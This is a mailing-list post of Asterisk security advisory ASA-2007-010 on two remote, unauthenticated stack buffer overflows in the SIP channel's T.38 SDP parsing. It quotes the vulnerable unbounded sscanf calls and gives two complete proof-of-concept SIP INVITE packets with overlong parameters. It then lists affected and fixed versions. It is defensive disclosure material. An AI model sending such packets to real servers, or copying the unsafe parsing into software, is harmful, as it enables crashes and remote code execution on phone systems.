[asterisk-users] ASA-2007-010: Two stack buffer overflows in SIP channel's T.38 SDP parsing code

Asterisk Development Team asteriskteam at digium.com
Tue Apr 24 16:20:26 MST 2007


>                Asterisk Project Security Advisory - ASA-2007-010
> 
>    +------------------------------------------------------------------------+
>    |      Product       | Asterisk                                          |
>    |--------------------+---------------------------------------------------|
>    |      Summary       | Two stack buffer overflows in SIP channel's T.38  |
>    |                    | SDP parsing code                                  |
>    |--------------------+---------------------------------------------------|
>    | Nature of Advisory | Exploitable Stack Buffer Overflow                 |
>    |--------------------+---------------------------------------------------|
>    |   Susceptibility   | Remote Unauthenticated Sessions                   |
>    |--------------------+---------------------------------------------------|
>    |      Severity      | Moderate                                          |
>    |--------------------+---------------------------------------------------|
>    |   Exploits Known   | No                                                |
>    |--------------------+---------------------------------------------------|
>    |    Reported On     | March 22, 2007                                    |
>    |--------------------+---------------------------------------------------|
>    |    Reported By     | Barrie Dempster, NGS Software,                    |
>    |                    | <barrie at ngssoftware.com>                          |
>    |--------------------+---------------------------------------------------|
>    |     Posted On      | April 24, 2007                                    |
>    |--------------------+---------------------------------------------------|
>    |  Last Updated On   | April 24, 2007                                    |
>    |--------------------+---------------------------------------------------|
>    |  Advisory Contact  | kpfleming at digium.com                              |
>    +------------------------------------------------------------------------+
> 
> +------------------------------------------------------------------------------------+
> |Description|Two closely related stack based buffer overflows exist in the SIP/SDP   |
> |           |handler of Asterisk, the vulnerabilities are very similar but exist as  |
> |           |two separate unsafe function calls. The T38FaxRateManagement and        |
> |           |T38FaxUdpEC SDP parameters can be exploited remotely leading to         |
> |           |arbitrary code execution without authentication. In order for these     |
> |           |overflows to occur, t38 fax over SIP must be enabled in sip.conf.       |
> |           |Examples of SIP INVITE packets are shown below, however these           |
> |           |vulnerabilities can be triggered with a number of different SIP messages|
> |           |affecting calls received by Asterisk, or in response to calls made by   |
> |           |Asterisk.                                                               |
> |           |                                                                        |
> |           |Remote Unauthenticated stack overflow in Asterisk SIP/SDP               |
> |           |T38FaxRateManagement parameter                                          |
> |           |                                                                        |
> |           |A remote unauthenticated stack overflow exists in the SIP/SDP handler of|
> |           |Asterisk. By sending a SIP packet with SDP data which includes an overly|
> |           |long T38 parameter it is possible to overflow a stack based buffer and  |
> |           |execute arbitrary code.                                                 |
> |           |                                                                        |
> |           |The process_sdp function of chan_sip.c in Asterisk contains the         |
> |           |following vulnerable call to sscanf.                                    |
> |           |                                                                        |
> |           |else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) {              |
> |           |                                                                        |
> |           |found = 1;                                                              |
> |           |                                                                        |
> |           |if (option_debug > 2)                                                   |
> |           |                                                                        |
> |           |ast_log(LOG_DEBUG, "RateMangement: %s\n", s);                           |
> |           |                                                                        |
> |           |if (!strcasecmp(s, "localTCF"))                                         |
> |           |                                                                        |
> |           |peert38capability |=                                                    |
> |           |                                                                        |
> |           |T38FAX_RATE_MANAGEMENT_LOCAL_TCF;                                       |
> |           |                                                                        |
> |           |else if (!strcasecmp(s, "transferredTCF"))                              |
> |           |                                                                        |
> |           |peert38capability |=                                                    |
> |           |                                                                        |
> |           |T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF;                                  |
> |           |                                                                        |
> |           |This attempts to read the "T38FaxRateManagement:" option from the SDP   |
> |           |within a SIP packet and copy the succeeding string into "s". There are  |
> |           |no checks on the length of this string and we can therefore write past  |
> |           |the boundaries of the "s" variable overwriting adjacent memory on the   |
> |           |stack. "s" is defined earlier in this function as being a character     |
> |           |array of only 256 bytes. The following example packet demonstrates an   |
> |           |overflow of this parameter:                                             |
> |           |                                                                        |
> |           |INVITE sip:200 at 127.0.0.1 SIP/2.0                                        |
> |           |                                                                        |
> |           |Date: Wed, 21 Mar 2007 4:20:09 GMT                                      |
> |           |                                                                        |
> |           |CSeq: 1 INVITE                                                          |
> |           |                                                                        |
> |           |Via: SIP/2.0/UDP                                                        |
> |           |                                                                        |
> |           |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
> |           |                                                                        |
> |           |User-Agent: NGS/2.0                                                     |
> |           |                                                                        |
> |           |From: "Barrie Dempster"                                                 |
> |           |                                                                        |
> |           |<sip:zeedo at 10.0.0.123:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672    |
> |           |                                                                        |
> |           |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672 at hades                  |
> |           |                                                                        |
> |           |To: <sip:200 at localhost>                                                 |
> |           |                                                                        |
> |           |Contact: <sip:zeedo at 10.0.0.123:5068;transport=udp>                      |
> |           |                                                                        |
> |           |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE               |
> |           |                                                                        |
> |           |Content-Type: application/sdp                                           |
> |           |                                                                        |
> |           |Content-Length: 796                                                     |
> |           |                                                                        |
> |           |Max-Forwards: 70                                                        |
> |           |                                                                        |
> |           |v=0                                                                     |
> |           |                                                                        |
> |           |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1           |
> |           |                                                                        |
> |           |s=-                                                                     |
> |           |                                                                        |
> |           |c=IN IP4 127.0.0.1                                                      |
> |           |                                                                        |
> |           |t=0 0                                                                   |
> |           |                                                                        |
> |           |m=image 5004 UDPTL t38                                                  |
> |           |                                                                        |
> |           |a=T38FaxVersion:0                                                       |
> |           |                                                                        |
> |           |a=T38MaxBitRate:14400                                                   |
> |           |                                                                        |
> |           |a=T38FaxMaxBuffer:1024                                                  |
> |           |                                                                        |
> |           |a=T38FaxMaxDatagram:238                                                 |
> |           |                                                                        |
> |           |a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA     |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAA                                                        |
> |           |                                                                        |
> |           |a=T38FaxUdpEC:t38UDPRedundancy                                          |
> |           |                                                                        |
> |           |-------------------------------------------------                       |
> |           |                                                                        |
> |           |Remote Unauthenticated stack overflow in Asterisk SIP/SDP T38FaxUdpEC   |
> |           |parameter                                                               |
> |           |                                                                        |
> |           |A remote unauthenticated stack overflow exists in the SIP/SDP handler of|
> |           |Asterisk. By sending a SIP packet with SDP data which includes an overly|
> |           |long T38FaxUdpEC parameter it is possible to overflow a stack based     |
> |           |buffer and execute arbitrary code.                                      |
> |           |                                                                        |
> |           |The process_sdp function of chan_sip.c in Asterisk contains the         |
> |           |following vulnerable call to sscanf.                                    |
> |           |                                                                        |
> |           |else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) {                       |
> |           |                                                                        |
> |           |found = 1;                                                              |
> |           |                                                                        |
> |           |if (option_debug > 2)                                                   |
> |           |                                                                        |
> |           |ast_log(LOG_DEBUG, "UDP EC: %s\n", s);                                  |
> |           |                                                                        |
> |           |if (!strcasecmp(s, "t38UDPRedundancy")) {                               |
> |           |                                                                        |
> |           |peert38capability |=                                                    |
> |           |                                                                        |
> |           |T38FAX_UDP_EC_REDUNDANCY;                                               |
> |           |                                                                        |
> |           |ast_udptl_set_error_correction_scheme(p->udptl,                         |
> |           |                                                                        |
> |           |UDPTL_ERROR_CORRECTION_REDUNDANCY);                                     |
> |           |                                                                        |
> |           |This attempts to read the "T38FaxUdpEC:" option from the SDP within a   |
> |           |SIP packet and copy the succeeding string into "s". There are no checks |
> |           |on the length of this string and we can therefore write past the        |
> |           |boundaries of the "s" variable overwriting adjacent memory on the stack.|
> |           |"s" is defined earlier in this function as being a character array of   |
> |           |only 256 bytes. The following example packet demonstrates an overflow of|
> |           |this parameter:                                                         |
> |           |                                                                        |
> |           |INVITE sip:200 at 127.0.0.1 SIP/2.0                                        |
> |           |                                                                        |
> |           |Date: Wed, 21 Mar 2007 4:20:09 GMT                                      |
> |           |                                                                        |
> |           |CSeq: 1 INVITE                                                          |
> |           |                                                                        |
> |           |Via: SIP/2.0/UDP                                                        |
> |           |                                                                        |
> |           |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
> |           |                                                                        |
> |           |User-Agent: NGS/2.0                                                     |
> |           |                                                                        |
> |           |From: "Barrie Dempster"                                                 |
> |           |                                                                        |
> |           |<sip:zeedo at 10.0.0.123:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672    |
> |           |                                                                        |
> |           |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672 at hades                  |
> |           |                                                                        |
> |           |To: <sip:200 at localhost>                                                 |
> |           |                                                                        |
> |           |Contact: <sip:zeedo at 10.0.0.123:5068;transport=udp>                      |
> |           |                                                                        |
> |           |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE               |
> |           |                                                                        |
> |           |Content-Type: application/sdp                                           |
> |           |                                                                        |
> |           |Content-Length: 796                                                     |
> |           |                                                                        |
> |           |Max-Forwards: 70                                                        |
> |           |                                                                        |
> |           |v=0                                                                     |
> |           |                                                                        |
> |           |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1           |
> |           |                                                                        |
> |           |s=-                                                                     |
> |           |                                                                        |
> |           |c=IN IP4 127.0.0.1                                                      |
> |           |                                                                        |
> |           |t=0 0                                                                   |
> |           |                                                                        |
> |           |m=image 5004 UDPTL t38                                                  |
> |           |                                                                        |
> |           |a=T38FaxVersion:0                                                       |
> |           |                                                                        |
> |           |a=T38MaxBitRate:14400                                                   |
> |           |                                                                        |
> |           |a=T38FaxMaxBuffer:1024                                                  |
> |           |                                                                        |
> |           |a=T38FaxMaxDatagram:238                                                 |
> |           |                                                                        |
> |           |a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA       |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAA                                                               |
> +------------------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Resolution | T.38 support in the affected versions of Asterisk is not  |
>    |            | enabled by default, therefore the severity of this issue  |
>    |            | is 'moderate'.                                            |
>    |            |                                                           |
>    |            | Users who are using the default configuration with        |
>    |            | 't38_udptl' set to 'no' or an equivalent value are not    |
>    |            | susceptible to this vulnerability. Users who have set     |
>    |            | this configuration item to 'yes' or an equivalent value   |
>    |            | but are not actually using T.38 support can set it to     |
>    |            | 'no' to secure their systems against this vulnerability.  |
>    |            |                                                           |
>    |            | All other users are urged to upgrade to the appropriate   |
>    |            | version of their Asterisk product listed in the           |
>    |            | 'Corrected In' section below.                             |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |                           Affected Versions                            |
>    |------------------------------------------------------------------------|
>    |           Product            |   Release   |                           |
>    |                              |   Series    |                           |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.0.x    | not affected; does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.2.x    | not affected, does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.4.x    | all releases prior to     |
>    |                              |             | 1.4.3                     |
>    |------------------------------+-------------+---------------------------|
>    |  Asterisk Business Edition   |    A.x.x    | not affected, does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |  Asterisk Business Edition   |    B.x.x    | not affected, does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |         AsteriskNOW          | pre-release | all releases prior to and |
>    |                              |             | including Beta 5          |
>    |------------------------------+-------------+---------------------------|
>    | Asterisk Appliance Developer |    0.x.x    | all releases prior to     |
>    |             Kit              |             | 0.4.0                     |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |                              Corrected In                              |
>    |------------------------------------------------------------------------|
>    |      Product       |                      Release                      |
>    |--------------------+---------------------------------------------------|
>    |   Asterisk Open    |               1.4.3, available from               |
>    |       Source       |    ftp://ftp.digium.com/pub/telephony/asterisk    |
>    |--------------------+---------------------------------------------------|
>    |    AsteriskNOW     |            Beta 6, when available from            |
>    |                    | http://www.asterisknow.org, Beta 5 users can use  |
>    |                    |   use 'System Update' in the appliance control    |
>    |                    |   panel to update their version of AsteriskNOW    |
>    |--------------------+---------------------------------------------------|
>    | Asterisk Appliance |               0.4.0, available from               |
>    |   Developer Kit    |      ftp://ftp.digium.com/pub/telephony/aadk      |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |        Links         |                                                 |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Asterisk Project Security Advisories are posted at                     |
>    | http://www.asterisk.org/security.                                      |
>    |                                                                        |
>    | This document may be superseded by later versions; if so, the latest   |
>    | version will be posted at                                              |
>    | http://www.asterisk.org/files/ASA-2007-010.pdf.                        |
>    +------------------------------------------------------------------------+
> 
>                Asterisk Project Security Advisory - ASA-2007-010
>               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
>   Permission is hereby granted to distribute and publish this advisory in its
>                            original, unaltered form.


More information about the asterisk-users mailing list